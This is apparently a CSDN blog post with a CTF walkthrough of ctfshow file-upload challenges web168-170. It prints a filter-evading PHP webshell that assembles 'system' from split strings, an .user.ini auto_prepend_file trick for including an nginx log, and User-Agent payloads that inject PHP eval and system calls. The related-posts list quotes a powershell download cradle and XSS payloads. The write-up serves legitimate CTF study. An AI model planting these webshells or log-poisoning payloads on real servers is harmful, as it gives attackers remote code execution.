web168(基础免杀)

已于 2022-04-08 23:49:56 修改
阅读量542 收藏
点赞数
分类专栏: web 文章标签: php web安全
于 2022-04-08 20:29:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52671379/article/details/124049256
版权
本文探讨了PHP环境中的一种基础免杀技术,通过字符串重组规避系统函数过滤实现命令执行。同时,介绍了利用.user.ini文件进行日志包含攻击的方法,以及如何通过修改请求头绕过文件类型检测实现远程代码执行。在web170中,虽然增加了文件头检查,但利用技巧仍然有效。
摘要由CSDN通过智能技术生成

web168

web168(基础免杀)

通过测试只可以上传png图片,
但是上传后没有任何回显,
并且对eval,system还有$_POST$_GET进行过滤,
$_REQUEST还可以用
PHP $_REQUEST 用于收集HTML表单提交的数据。
$_REQUEST 提交两次数据,一次为参数,一次为函数system
php免杀绕过
miansha.php

<?php
$a = "s#y#s#t#e#m";
$b = explode("#",$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?>

explode() 函数使用一个字符串分割另一个字符串,并返回由字符串组成的数组。
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];组合为system
上传miansha.png抓包修改后缀为php
在这里插入图片描述访问/upload/miansha.php,直接rce拿到flag

web169

简单测试发现过滤一堆函数,和关键字
在这里插入图片描述但是配置文件任可以抓包上传

在这里插入图片描述尝试日志包含

GIF89a
auto_prepend_file=/var/log/nginx/access.log

在这里插入图片描述修改UA,

User-Agent: <?=`tac ../f*` ?>
User-Agent: <?=`ls ../` ?>
User-Agent: <?=`echo '11111111'` ?>
User-Agent: <?php system('tac ../f*');?>
User-Agent: <?php @eval($_POST['xiaoyu']); ?>

随后抓包上传一个无内容的php文件,访问php
在这里插入图片描述都是老样子,没能执行成功,
在这里插入图片描述发现日志包含的地方错了
一句话要包含在php文件的UA头
访问,rce拿到flag
在这里插入图片描述

web170(.user.ini包含)

上一题的一样,有点区别就是做了个文件头检查
不过我习惯检不检查都加,所以一样的思路
在这里插入图片描述
在这里插入图片描述

老young可爱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP WebShell 免杀
悦分享
08-01 5846
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
CTFshow 文件上传 web168
Kradress的博客
02-17 391
目录思路总结 思路 先查看源代码,发现限制上传png 直接上传png的图片马,回显null,发现对eval,system还有$_POST和$_GET进行过滤,$_REQUEST还可以用 替换图片马中的一句话,把文件后缀改成php,成功上传 <?php $_REQUEST[0]($_REQUEST[1]);?> 访问/upload/shell.php,直接rce拿到flag 总结 … ...
ctfshow web入门(文件上传)
qq_53263789的博客
07-19 2320
ctfshow 文件上传
文件上传(ctfshow,upload-labs,文件上传字典生成)
qq_47168481的博客
11-17 3596
准备了10几天的美亚杯,最后结果也是很满意的,拿到了一等奖,不过还是得继续学习web,冲冲冲!(全部复现有点麻烦,有的图借用了其他大佬的) web151-web152 本题即绕过前端验证,只需上传一个png图片(图片马,普通图片需添加一句话),在burp截断时修改content-type为php即可绕过,再进入文件目录,利用命令执行得到flag 制作图片马的方法: 用一张小点的图片和一句话木马,利用copy命令生成图片马 copy 1.png/b+2.php/a 3.png web153-web160
CTF-web 第十部分 webshell基础免杀
热门推荐
iamsongyu的博客
11-15 1万+
一、什么是webshell (1)webshell简介         webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载...
【网络安全】木马免杀方式——加壳免杀
最新发布
weixin_42340783的博客
08-02 1514
免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1196
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
CS免杀
anwen12的博客
02-06 5133
Cobaltstrike 一、基础使用 ./teamserver 192.168.43.224 123456 启动服务器端 在windows下的链接 双击bat文件即可 在linux下 ./start.sh 让目标机器链接上teamserver 1.设置好监听器 2.生成攻击载荷 url它是个文件路径,就是让目标(受害者)通过地址下载恶意脚本 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring
CTFshow——web入门——文件上传
h_adam的博客
02-17 5018
web151 前端校验 修改上传格式为php,上传一句话马,蚁剑连接得flag web152 后端校验 上传一句话,png文件抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。 web153 打开发现/upload下存在index.php文件,我们可以利用.user.ini,可参阅.htaccess 和.user.ini 配置文件妙用 php手册—关于php.ini配置项 前端把后缀限制去掉,accept改为file,上传user.ini Content-Type修改为image/png
红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?
Ms08067安全实验室
09-01 1437
文章来源|MS08067 红队培训班第12节课作业本文作者:某学员A(红队培训班1期学员)按老师要求尝试完成布置的作业如下:一、远程线程注入(一)通过MSF生成payload通过msfve...
web网络安全渗透
Kevinzkyy的博客
04-07 1114
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
web安全攻防渗透测试实战指南
jhf223344的博客
04-05 8996
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 19...
Upload-labs
qq_52671379的博客
04-01 4679
Upload-labs
buuctf [网鼎杯 2020 玄武组]SSRFMe
qq_52671379的博客
04-23 3551
buuctf [网鼎杯 2020 玄武组]SSRFMe
buuctf [第三章 web进阶]Python里的SSRF
qq_52671379的博客
04-21 3022
buuctf [第三章 web进阶]Python里的SSRF
xss-labs通关技巧
qq_52671379的博客
04-25 2876
第一关 标签注入 <script>alert(1)</script> 没有任何防护措施 第二关 我们输入的数据,是在表单中的value属性内,所以需要先闭合input标签 "><script>alert(1)</script> 法二: 闭合value属性,然后在input标签内加入事件属性 " οnclick="alert(1) 查看源码: 在h2标签中有.htmlspecialchars(str),所以在该地方虽然有回显我们的恶意代码,但是不能x
[极客大挑战 2019]LoveSQL
qq_52671379的博客
01-18 2574
[极客大挑战 2019]LoveSQL
buuctf [第二章 web进阶]SSRF Training
qq_52671379的博客
04-20 2030
buuctf [第二章 web进阶]SSRF Training
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值